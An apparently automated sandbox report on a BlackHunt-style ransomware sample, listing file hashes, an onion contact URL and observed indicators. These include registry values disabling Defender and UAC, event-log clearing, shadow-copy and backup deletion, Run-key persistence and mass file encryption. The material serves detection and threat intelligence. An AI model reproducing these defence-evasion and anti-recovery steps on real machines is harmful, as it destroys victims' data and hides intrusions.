Analysis
-
max time kernel
91s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:05
Static task
static1
Behavioral task
behavioral1
Sample
8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Resource
win10v2004-20231215-en
General
-
Target
8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
-
Size
707KB
-
MD5
7872e09ba0a15441604e90545b04aab7
-
SHA1
c501ee9736dae19a046715f114e1ac7baf287f2f
-
SHA256
8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f
-
SHA512
4304de6648353dc7c4dc5a906e53e66d17018b69d6ffceb9718455288d71fb9237de6ca9755a41d892522f003c8751939c860cdfa54765915c765dd7492bb60a
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1I8Qvnh:6uaTmkZJ+naie5OTamgEoKxLW7Oh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 7592 fsutil.exe 13780 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 8968 wevtutil.exe 9212 wevtutil.exe 9780 wevtutil.exe 7848 wevtutil.exe 11604 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 7576 bcdedit.exe 7636 bcdedit.exe 8396 bcdedit.exe 7768 bcdedit.exe -
Renames multiple (3388) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 7548 wbadmin.exe 8016 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\O: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\A: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\G: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\J: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\N: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\M: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\R: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\K: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\L: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\X: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\T: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\Z: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\Q: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\Y: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\U: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\I: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\P: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\W: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\V: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\S: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\E: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\B: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\F: WaaSMedicAgent.exe File opened (read-only) \??\H: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\tr-tr\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\da-dk\#BlackHunt_ReadMe.hta 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sv-se\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jsse.jar 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\warning_2x.png 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\cs-cz\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\nub.png 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\Java\jdk-1.8\legal\jdk\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\VideoLAN\VLC\locale\co\#BlackHunt_ReadMe.hta 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\#BlackHunt_ReadMe.hta 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\ui-strings.js 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ui-strings.js 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\#BlackHunt_ReadMe.hta 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\#BlackHunt_ReadMe.hta 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\dotnet\host\fxr\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\#BlackHunt_ReadMe.hta 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ro-ro\ui-strings.js 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\ui-strings.js 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\#BlackHunt_ReadMe.hta 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\ui-strings.js 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hu-hu\ui-strings.js 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-gb\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\it-it\ui-strings.js 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\ui-strings.js 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pl-pl\ui-strings.js 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\ui-strings.js 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\de-de\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fi-fi\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\images\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nb-no\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nb-no\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\#BlackHunt_ReadMe.hta 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Google\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\tr-tr\#BlackHunt_ReadMe.hta 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\SplitPublish.jpeg 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jce.jar 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\US_export_policy.jar 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_selectlist_checkmark_18.svg 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fi_get.svg 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\#BlackHunt_ReadMe.hta 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nb-no\#BlackHunt_ReadMe.hta 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\th_get.svg 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\editpdf-tool-view.js 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2408 6896 WerFault.exe 256 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4288 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 10076 vssadmin.exe 7240 vssadmin.exe 7332 vssadmin.exe 11704 vssadmin.exe 4844 vssadmin.exe 1456 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 11092 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" Conhost.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 944 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe Token: SeRestorePrivilege 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe Token: SeBackupPrivilege 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe Token: SeTakeOwnershipPrivilege 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe Token: SeAuditPrivilege 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe Token: SeSecurityPrivilege 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe Token: SeIncBasePriorityPrivilege 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe Token: SeBackupPrivilege 1560 vssvc.exe Token: SeRestorePrivilege 1560 vssvc.exe Token: SeAuditPrivilege 1560 vssvc.exe Token: SeBackupPrivilege 12972 wbengine.exe Token: SeRestorePrivilege 12972 wbengine.exe Token: SeSecurityPrivilege 12972 wbengine.exe Token: SeSecurityPrivilege 9212 wevtutil.exe Token: SeBackupPrivilege 9212 wevtutil.exe Token: SeSecurityPrivilege 8968 wevtutil.exe Token: SeBackupPrivilege 8968 wevtutil.exe Token: SeSecurityPrivilege 11604 wevtutil.exe Token: SeBackupPrivilege 11604 wevtutil.exe Token: SeSecurityPrivilege 7848 wevtutil.exe Token: SeBackupPrivilege 7848 wevtutil.exe Token: SeSecurityPrivilege 9780 wevtutil.exe Token: SeBackupPrivilege 9780 wevtutil.exe Token: SeDebugPrivilege 11092 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2568 wrote to memory of 1556 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 91 PID 2568 wrote to memory of 1556 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 91 PID 2568 wrote to memory of 3876 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 90 PID 2568 wrote to memory of 3876 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 90 PID 2568 wrote to memory of 5036 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 93 PID 2568 wrote to memory of 5036 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 93 PID 2568 wrote to memory of 1648 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 174 PID 2568 wrote to memory of 1648 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 174 PID 2568 wrote to memory of 3292 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 99 PID 2568 wrote to memory of 3292 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 99 PID 1556 wrote to memory of 2832 1556 cmd.exe 98 PID 1556 wrote to memory of 2832 1556 cmd.exe 98 PID 2568 wrote to memory of 5064 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 100 PID 2568 wrote to memory of 5064 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 100 PID 2568 wrote to memory of 3732 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 105 PID 2568 wrote to memory of 3732 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 105 PID 3876 wrote to memory of 3280 3876 cmd.exe 168 PID 3876 wrote to memory of 3280 3876 cmd.exe 168 PID 5036 wrote to memory of 1268 5036 cmd.exe 103 PID 5036 wrote to memory of 1268 5036 cmd.exe 103 PID 1648 wrote to memory of 4340 1648 Conhost.exe 170 PID 1648 wrote to memory of 4340 1648 Conhost.exe 170 PID 2568 wrote to memory of 2452 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 107 PID 2568 wrote to memory of 2452 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 107 PID 3292 wrote to memory of 2248 3292 cmd.exe 109 PID 3292 wrote to memory of 2248 3292 cmd.exe 109 PID 2568 wrote to memory of 1792 2568 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 113 